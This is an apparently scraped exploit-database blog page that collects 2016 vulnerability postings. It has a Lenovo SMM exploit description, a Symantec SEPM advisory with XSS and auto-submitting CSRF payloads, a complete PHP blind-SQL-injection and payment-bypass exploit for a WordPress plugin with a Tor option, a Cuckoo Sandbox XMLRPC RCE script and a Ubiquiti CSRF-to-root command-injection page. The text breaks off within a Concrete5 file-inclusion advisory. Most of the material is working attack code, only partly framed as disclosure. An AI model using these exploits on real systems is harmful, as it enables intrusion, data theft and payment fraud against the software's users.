Source: https://github.com/Cr4sh/ThinkPwn
Lenovo ThinkPad System Management Mode arbitrary code execution exploit
***************************************************************************
For more information about this project please read the following article:
http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html
This code exploits 0day privileges escalation vulnerability (or backdoor?) in SystemSmmRuntimeRt UEFI driver (GUID is 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. Vulnerability is present in all of the ThinkPad series laptops, the oldest one that I have checked is X220 and the neweset one is T450s (with latest firmware versions available at this moment). Running of arbitrary System Management Mode code allows attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do others evil things.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863289324
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.symantec.com
Product:
===========
SEPM
Symantec Endpoint Protection Manager and client v12.1
SEPM provides a centrally managed solution. It handles security policy
enforcement, host integrity checking (Symantec Network Access Control only),
and automated remediation over all clients. The policies functionality is
the heart of the Symantec software. Clients connect to the server to get the
latest policies, security settings, and software updates.
Vulnerability Type(s):
======================
Multiple Cross Site Scripting (XSS)
Cross Site Request Forgeries (CSRF)
Open Redirect
CVE Reference(s):
=================
CVE-2016-3652 / XSS
CVE-2016-3653 / CSRF
CVE-2016-5304 / Open Redirect
Vulnerability Details:
=====================
The management console for SEPM contains a number of security
vulnerabilities that could be used by a lower-privileged user or by
an unauthorized user to elevate privilege or gain access to unauthorized
information on the management server. Exploitation attempts of
these vulnerabilities requires access to the SEP Management console.
References:
============
https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01
Exploit code(s):
===============
In this case XSS can bypass the "http-only" cookie protection because the
SEPM application writes and stores the session ID within various
javascript functions used by the application within the DOM thereby
exposing them directly to the XSS attack.
1) createModalDialogFromURL
2) createWindowFromURL
3) createWindowFromForm
4) createIEWindowFromForm
So all we need to do is alert(createModalDialogFromURL) anyone one of them
(functions) an it will leak the session ID essentially throwing the
HttpOnly secure cookie protection flag into the garbage.
e.g.
XSS POC Defeat http-only flag and access PHPSESSID:
https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
Open Redirect in external URL .php script:
=========================================
A reporting URL used to route generated reports externally to any
authorized URL is susceptible to an open redirect vulnerability
that could have allowed an authorized but less-privileged user to redirect
an unsuspecting privileged user to an external URL to
attempt further exploitation, e.g. phishing.
If a victim clicks on a link supplied by an attacker
e.g.
https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
Cross Site Request Forgery (CSRF):
==================================
Multiple Cross Site Request Forgery exists in couple of places within this
version of SEPM below is an example of sending scheduled report to
an remote attackers email, if current logged in user visits malicious
webpage or clicks infected link etc...
Symantec Reporting Admin CSRF POC:
<form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php"
method="POST" />
<input type="hidden" name="ReportName" value="HELL" />
<input type="hidden" name="Description" value="PWNED!" />
<input type="hidden" name="DisableReportSchedule" value="on" />
<input type="hidden" name="NewReport" value="Y" />
<input type="hidden" name="reporttype" value="1" />
<input type="hidden" name="FILTERNAME" value="Default" />
<input type="hidden" name="runEvery" value="1" />
<input type="hidden" name="repeat" value="weekly" />
<input type="hidden" name="datesched1" value="02%2F10%2F2016" />
<input type="hidden" name="datesched2" value="02%2F10%2F2016" />
<input type="hidden" name="filHourSchedule" value="16" />
<input type="hidden" name="Schedulehour" value="16" />
<input type="hidden" name="filMinSchedule" value="56" />
<input type="hidden" name="Scheduleminute" value="56" />
<input type="hidden" name="sysadmin" value="off" />
<input type="hidden" name="sendto" value="evil@abyss.com" />
<input type="hidden" name="updatelastrun" value="0" />
<input type="hidden" name="HISTORYCONFIG_IDX" value="" />
<input type="hidden" name="ReportPrefix" value="Y" />
<input type="hidden" name="report_idx" value="Y-0" />
<script>document.getElementById('PWN').submit()</script>
</form>
Disclosure Timeline:
============================================
Vendor Notification: Febuary 11, 2016
Vendor Acknowledges Report: Febuary 12, 2016
Vendor Releases Fix: June 28, 2016
June 29, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level(s):
====================
Cross Site Scripting
Medium
v2 6.8
AV:A/AC:M/Au:S/C:C/I:C/A:N
v3 6.7
AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
Cross Site Request Forgery
High
v2 7.0
AV:A/AC:M/Au:M/C:C/I:C/A:C
v3 7.1
AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Open Redirect
Medium
v2 4.1
AV:A/AC:L/Au:S/C:P/I:P/A:N
v3 4.1
AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
<?php
/**
* Exploit Title: Ultimate Membership Pro WordPress Plugin Exploit
* Google Dorks: inurl:"lid=0" OR inurl:"lid=1" ... inurl:"lid=100" "Register" "Confirm Password"
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wpindeed.com/
* Software Link: http://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
* Version: 3.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Unauthenticated Blind SQLi, Unauthenticated Payment Bypass
* Time line: Found [07-Jun-2016], Vendor notified [08-Jun-2016], Vendor fixed: [Yes], [RD:1466846149]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:l:e:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function isTrue($sql){
global $curl, $options;
$levels = "') union all select (SELECT CASE WHEN ($sql) then 1 else 1*(select table_name from information_schema.tables) end)#";
$data = array(
'action'=>'ihc_preview_user_listing',
'shortcode'=>'[ihc-list-users filter_by_level="1" levels_in="'.$levels.'" theme="ihc-theme_1" ]'
);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
return preg_match('~ihc_public_list_users_(\d+)~',$resp);
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'pay'){
$level = $options['l'];
for($i=$options['s']; $i<$options['e']; $i++){
//This is mental, no IP or Hash check!
echo "Paying Level $level to UserID: $i\n";
$data = array('x_MD5_Hash'=>'1', 'x_response_code'=>'1', 'x_cust_id'=>$i, 'x_po_num'=>$level);
$curl->post($options['t'].'wp-content/plugins/indeed-membership-pro/authorize_response.php', $data);
//echo $curl->getResponse();
}
}
if ($options['m'] == 'sql'){
$query = $options['s'];
echo "'Running' SQL Query: $query\n";
echo "Getting Length";
$max_length = 100;
//Well, it is messed up, can use , (comma) in the query
//Binary search or divide et impera is possible with the BETWEEN operator
//Code it yourself :)
$len = 0;
for ($i=1;$i<$max_length;$i++){
$sql_len = "(select char_length( ($query) ) = $i )";
if (isTrue($sql_len)){
echo "\nLength found: $i\n";
$len = $i;
break;
} else {
echo ".";
}
}
if ($len !== 0 ){
echo "Reading char by char\nResponse:\n";
} else {
die("Failed getting length!\nAboring.\n\n");
}
$charset = 'etaoinsrhdluc@*1234567890.mfywgpbvkxqjzETAOINSRHDLUCMFYWGPBVKXQJZ';
for ($i=1;$i<$len;$i++){
$got = false;
for ($j=0;$j<strlen($charset);$j++){
$chr = $charset[$j];
$question = "SELECT substr(($query) FROM $i FOR 1) = '$chr' ";
if (isTrue($question)){
echo $charset[$j];
$got = true;
break;
}
}
if (!$got){
echo "?";
}
}
echo "\n\n";
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!isset($options['m']) || !in_array($options['m'], array('sql', 'pay') ) ){
return false;
}
if ($options['m'] == 'sql' && !isset($options['s'])) {
return false;
}
if ($options['m'] == 'pay' && ( !isset($options['s']) || !isset($options['e']) || !isset($options['l']))) {
return false;
}
if ($options['m'] == 'pay' && ( !is_numeric($options['s']) || !is_numeric($options['e']) || !is_numeric($options['l']) )) {
echo "In pay mode -s -e and -l must be numeric!\n";
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Ultimate Membership Pro 8.4.1.3 WordPress Plugin Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE] -s [QUERY] -s [START] -e [END] -l [LEVEL]
[MODE] sql - Blind SQL Inject mode*
pay - Payment bypass. Parameters -l Level ID (&lid=XX in the url), -s Start UserID, -e End UserID
*Note: You can't use , (comma) in the query.
Examples:
php $argv[0] -t http://localhost/ --tor=yes -m sql -s 'select user()'
php $argv[0] -t http://localhost/ --tor=yes -m pau -s 0 -e 1000 -l 1
Marks all users with UserID between 0 and 1000 as paying customer for level ID 1
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection
or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or
potentially escape the sandbox machine itself. An attacker could also
exploit
such bugs as a pivot in order to attack sensitive systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
def execute(x, cmd="cmd /c start"):
output = StringIO()
file = ZipFile(output, "w", ZIP_STORED)
info = ZipInfo("analyzer.py")
info.compress_type = ZIP_DEFLATED
content = ("""
import subprocess
if __name__ == "__main__":
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
file.writestr(info, content)
file.close()
data = xmlrpclib.Binary(output.getvalue())
if x.add_analyzer(data):
return x.execute()
if __name__ == "__main__":
x = xmlrpclib.ServerProxy("http://localhost:8000")
execute(x, "calc.exe")
# x.complete() # Blackout mode
<!--
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt
1. Vulnerability Details
Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF);
CWE-77: Improper Neutralization of Special Elements
used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP
2. Vulnerability Description
The Ubiquiti AirGateway, AirFiber and mFi platforms feature
remote administration via an authenticated web-based portal.
Lack of CSRF protection in the Remote Administration Portal,
and unsafe passing of user input to operating system commands
exectuted with root privileges, can be abused in a way that
enables remote command execution.
3. Technical Description
The firmware files analyzed were
AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and
firmware.bin respectively.
The MD5 hash values for the vulnerable files served by the
administration portal are:
AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi
AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi
mFi 960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi
The firmware file contains a LZMA compressed, squashfs
partition. The binaries running on the embedded device are
compiled for a MIPS CPU. The device can be easily virtualized
using QEMU:
Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd
-f /etc/lighttpd/lighttpd.conf
The administration portal does not issue a randomized CSRF
token either per session, page, or request. Administration
authorization is solely based on cookie control. Therefore,
it is possible to embed JavaScript into an HTML page so when
an administrator is socially engineered into visiting the page,
the target device will be accessed with privileges.
Device configuration POST parameters include tokens passed to
operating system commands run as root in unsafe ways with
insufficient input sanitization. Command injection is possible
by stacking shell commands in parameters such as
iptables.1.cmd.
In order for a developer to recreate this discovery, the
following instructions should be duplicated.
a. Authenticate to the target web application and navigate to the
SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the
line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the
changes using apply.cgi afterward.
Example:
POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0)
Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------4384928471732886672453075690
Content-Length: 7204
...
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...
GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426;
AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
f. Change your IP address, but ensure continued routing to the target web
application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the
modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step 5 from the new IP address. You will receive the same
response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp
and type ls.
j. You'll discover both files exist.
4. Mitigation and Remediation Recommendation
At this time there is no vendor patch for this vulnerability.
The vendor was unable or unwilling to communicate an expected release
date for a proper mitigation.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.02.25 - KoreLogic sends vulnerability report and PoC to Ubiquiti.
2016.02.26 - Ubiquiti acknowledges receipt of vulnerability report.
2016.04.12 - 30 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.04.21 - KoreLogic asks for an update on the remediation effort.
2016.04.29 - Ubiquiti replies that the patch will require
"significant changes" but does not provide an estimate
of the release time table.
2016.05.04 - 45 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.05.12 - KoreLogic requests an update from Ubiquiti.
2016.05.23 - KoreLogic requests an update from Ubiquiti.
2016.06.23 - 80 business days have elapsed since the vulnerability was
reported to Ubiquiti.
2016.06.28 - Public disclosure.
7. Proof of Concept
########################################################################
#
# Copyright 2016 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
#######################################################################*
This example has been performed against the AirGateway device running the
1.1.6 firmware version. In order to recreate this vulnerability on
AirFiber and mFi, the attacker should first obtain a valid copy of the
device configuration and update this proof-of-concept code.
-->
<html>
<body>
<form action="https://192.168.1.1/apply.cgi" id="airos-exploit-apply">
<input type="submit" value="Submit request" />
</form>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.1.1/system.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------761818923593135447208368355");
xhr.withCredentials = true;
var body = "-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"fwfile\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"fwupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"update_status\"\r\n" +
"\r\n" +
"enabled\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"hostname\"\r\n" +
"\r\n" +
"airGateway\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"timezone\"\r\n" +
"\r\n" +
"GMT\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"ui_language\"\r\n" +
"\r\n" +
"en_US\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"adminname\"\r\n" +
"\r\n" +
"ubnt\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"latitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"longitude\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgfile\"; filename=\"hacked.cfg\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"aaa.1.radius.acct.1.status=disabled\n" +
"wpasupplicant.status=disabled\n" +
"wpasupplicant.device.1.status=disabled\n" +
"wireless.status=enabled\n" +
"wireless.1.wds.status=disabled\n" +
"wireless.1.wds.6.peer=\n" +
"wireless.1.wds.5.peer=\n" +
"wireless.1.wds.4.peer=\n" +
"wireless.1.wds.3.peer=\n" +
"wireless.1.wds.2.peer=\n" +
"wireless.1.wds.1.peer=\n" +
"wireless.1.status=enabled\n" +
"wireless.1.ssid=www.ubnt.com\n" +
"wireless.1.security.type=none\n" +
"wireless.1.scan_list.status=disabled\n" +
"wireless.1.mac_acl.policy=allow\n" +
"wireless.1.mac_acl.status=disabled\n" +
"wireless.1.hide_ssid=disabled\n" +
"wireless.1.devname=ath0\n" +
"wireless.1.autowds=disabled\n" +
"wireless.1.authmode=1\n" +
"wireless.1.ap=\n" +
"wireless.1.addmtikie=enabled\n" +
"vlan.status=disabled\n" +
"users.status=enabled\n" +
"users.1.status=enabled\n" +
"users.1.password=VvpvCwhccFv6Q\n" +
"users.1.name=ubnt\n" +
"upnpd.devname=\n" +
"upnpd.status=disabled\n" +
"tshaper.status=disabled\n" +
"telnetd.status=enabled\n" +
"telnetd.port=23\n" +
"system.modules.blacklist.status=disabled\n" +
"system.eirp.status=disabled\n" +
"system.cfg.version=65542\n" +
"syslog.status=disabled\n" +
"syslog.remote.status=\n" +
"sshd.status=enabled\n" +
"sshd.port=22\n" +
"sshd.auth.passwd=enabled\n" +
"snmp.status=disabled\n" +
"route.1.devname=eth0\n" +
"route.1.status=disabled\n" +
"route.1.comment=\n" +
"route.1.gateway=0.0.0.0\n" +
"route.1.netmask=0\n" +
"route.1.ip=0.0.0.0\n" +
"route.status=enabled\n" +
"resolv.nameserver.2.status=enabled\n" +
"resolv.nameserver.2.ip=\n" +
"resolv.nameserver.1.status=enabled\n" +
"resolv.nameserver.1.ip=\n" +
"resolv.status=disabled\n" +
"radio.status=enabled\n" +
"radio.countrycode=840\n" +
"radio.1.txpower=18\n" +
"radio.1.subsystemid=0xe4c2\n" +
"radio.1.status=enabled\n" +
"radio.1.reg_obey=disabled\n" +
"radio.1.rate.mcs=7\n" +
"radio.1.rate.auto=enabled\n" +
"radio.1.obey=disabled\n" +
"radio.1.mode=master\n" +
"radio.1.mcastrate=\n" +
"radio.1.low_txpower_mode=disabled\n" +
"radio.1.ieee_mode=11nght20\n" +
"radio.1.freq=0\n" +
"radio.1.forbiasauto=1\n" +
"radio.1.dfs.status=enabled\n" +
"radio.1.devname=ath0\n" +
"radio.1.cwm.mode=0\n" +
"radio.1.cwm.enable=0\n" +
"radio.1.countrycode=840\n" +
"radio.1.clksel=1\n" +
"radio.1.chanshift=\n" +
"radio.1.chanbw=0\n" +
"radio.1.antenna.id=4\n" +
"radio.1.acktimeout=25\n" +
"radio.1.ackdistance=600\n" +
"pwdog.status=enabled\n" +
"pwdog.retry=3\n" +
"pwdog.period=300\n" +
"pwdog.host=8.8.8.8\n" +
"pwdog.delay=300\n" +
"ppp.status=disabled\n" +
"ntpclient.status=enabled\n" +
"ntpclient.1.status=enabled\n" +
"ntpclient.1.server=0.ubnt.pool.ntp.org\n" +
"netmode=soho\n" +
"netconf.5.up=enabled\n" +
"netconf.5.hwaddr.mac=\n" +
"netconf.5.hwaddr.status=disabled\n" +
"netconf.5.autoip.status=disabled\n" +
"netconf.5.role=mlan\n" +
"netconf.5.mtu=1500\n" +
"netconf.5.devname=eth0\n" +
"netconf.5.status=disabled\n" +
"netconf.4.up=enabled\n" +
"netconf.4.netmask=255.255.255.0\n" +
"netconf.4.ip=0.0.0.0\n" +
"netconf.4.hwaddr.mac=\n" +
"netconf.4.hwaddr.status=disabled\n" +
"netconf.4.autoip.status=disabled\n" +
"netconf.4.role=bridge_port\n" +
"netconf.4.mtu=1500\n" +
"netconf.4.devname=eth1\n" +
"netconf.4.status=enabled\n" +
"netconf.3.up=enabled\n" +
"netconf.3.netmask=255.255.255.0\n" +
"netconf.3.ip=192.168.1.1\n" +
"netconf.3.hwaddr.mac=\n" +
"netconf.3.hwaddr.status=disabled\n" +
"netconf.3.autoip.status=disabled\n" +
"netconf.3.role=lan\n" +
"netconf.3.mtu=1500\n" +
"netconf.3.devname=br0\n" +
"netconf.3.status=enabled\n" +
"netconf.2.up=enabled\n" +
"netconf.2.promisc=enabled\n" +
"netconf.2.netmask=255.255.255.0\n" +
"netconf.2.ip=0.0.0.0\n" +
"netconf.2.hwaddr.mac=\n" +
"netconf.2.hwaddr.status=disabled\n" +
"netconf.2.autoip.status=disabled\n" +
"netconf.2.role=bridge_port\n" +
"netconf.2.mtu=1500\n" +
"netconf.2.devname=ath0\n" +
"netconf.2.status=enabled\n" +
"netconf.1.up=enabled\n" +
"netconf.1.promisc=enabled\n" +
"netconf.1.netmask=255.255.255.0\n" +
"netconf.1.ip=0.0.0.0\n" +
"netconf.1.hwaddr.mac=\n" +
"netconf.1.hwaddr.status=disabled\n" +
"netconf.1.autoip.status=disabled\n" +
"netconf.1.role=wan\n" +
"netconf.1.mtu=1500\n" +
"netconf.1.devname=eth0\n" +
"netconf.1.status=enabled\n" +
"netconf.status=enabled\n" +
"iptables.sys.upnpd.devname=\n" +
"iptables.sys.upnpd.status=disabled\n" +
"iptables.sys.status=enabled\n" +
"iptables.sys.portfw.status=disabled\n" +
"iptables.sys.mgmt.status=disabled\n" +
"iptables.sys.masq.1.status=enabled\n" +
"iptables.sys.masq.1.devname=eth0\n" +
"iptables.sys.masq.status=enabled\n" +
"iptables.sys.fw.status=disabled\n" +
"iptables.sys.dmz.status=disabled\n" +
"iptables.1.comment=\n" +
"iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/hacked.txt\n" +
"iptables.1.status=enabled\n" +
"iptables.status=enabled\n" +
"igmpproxy.status=enabled\n" +
"igmpproxy.upstream.devname=eth0\n" +
"igmpproxy.1.downstream.devname=br0\n" +
"httpd.status=enabled\n" +
"httpd.session.timeout=900\n" +
"httpd.port=80\n" +
"httpd.https.status=enabled\n" +
"httpd.https.port=443\n" +
"gui.wlan.advanced.status=disabled\n" +
"gui.network.advanced.status=enabled\n" +
"ebtables.sys.vlan.status=disabled\n" +
"ebtables.sys.status=enabled\n" +
"ebtables.sys.eap.status=disabled\n" +
"ebtables.sys.eap.1.status=enabled\n" +
"ebtables.sys.eap.1.devname=ath0\n" +
"ebtables.sys.arpnat.status=disabled\n" +
"ebtables.sys.arpnat.1.status=enabled\n" +
"ebtables.sys.arpnat.1.devname=ath0\n" +
"ebtables.status=enabled\n" +
"dyndns.status=disabled\n" +
"dnsmasq.status=disabled\n" +
"dnsmasq.1.status=disabled\n" +
"dnsmasq.1.devname=eth0\n" +
"discovery.status=enabled\n" +
"discovery.cdp.status=enabled\n" +
"dhcpd.1.start=192.168.1.2\n" +
"dhcpd.1.netmask=255.255.255.0\n" +
"dhcpd.1.lease_time=600\n" +
"dhcpd.1.end=192.168.1.254\n" +
"dhcpd.1.dnsproxy=enabled\n" +
"dhcpd.1.devname=br0\n" +
"dhcpd.1.dns.2.status=disabled\n" +
"dhcpd.1.dns.2.server=\n" +
"dhcpd.1.dns.1.status=disabled\n" +
"dhcpd.1.dns.1.server=\n" +
"dhcpd.1.status=enabled\n" +
"dhcpd.status=enabled\n" +
"dhcpc.1.status=enabled\n" +
"dhcpc.1.fallback_netmask=255.255.255.0\n" +
"dhcpc.1.fallback=192.168.10.1\n" +
"dhcpc.1.devname=eth0\n" +
"dhcpc.status=enabled\n" +
"bridge.1.fd=1\n" +
"bridge.1.comment=\n" +
"bridge.1.port.2.devname=eth1\n" +
"bridge.1.port.2.status=enabled\n" +
"bridge.1.port.1.devname=ath0\n" +
"bridge.1.port.1.status=enabled\n" +
"bridge.1.stp.status=disabled\n" +
"bridge.1.devname=br0\n" +
"bridge.1.status=enabled\n" +
"bridge.status=enabled\n" +
"aaa.status=disabled\n" +
"aaa.1.status=disabled\n" +
"aaa.1.radius.macacl.status=disabled\n" +
"aaa.1.radius.auth.1.status=disabled\n" +
"\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"cfgupload\"\r\n" +
"\r\n" +
"Upload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"action\"\r\n" +
"\r\n" +
"cfgupload\r\n" +
"-----------------------------761818923593135447208368355\r\n" +
"Content-Disposition: form-data; name=\"systemdate\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------761818923593135447208368355--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
document.getElementById("airos-exploit-apply").submit();
</script>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
-------------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 (Application::dispatch) Local File Inclusion Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.concrete5.org/
[-] Affected Versions:
Version 5.7.3.1 and probably other versions.
[-] Vulnerability Description:
The vulnerable code is located within the "Application::dispatch()" method:
326. public function dispatch(Request $request)
327. {
328. if ($this->installed) {
329. $response = $this->getEarlyDispatchResponse();
330. }
331. if (!isset($response)) {
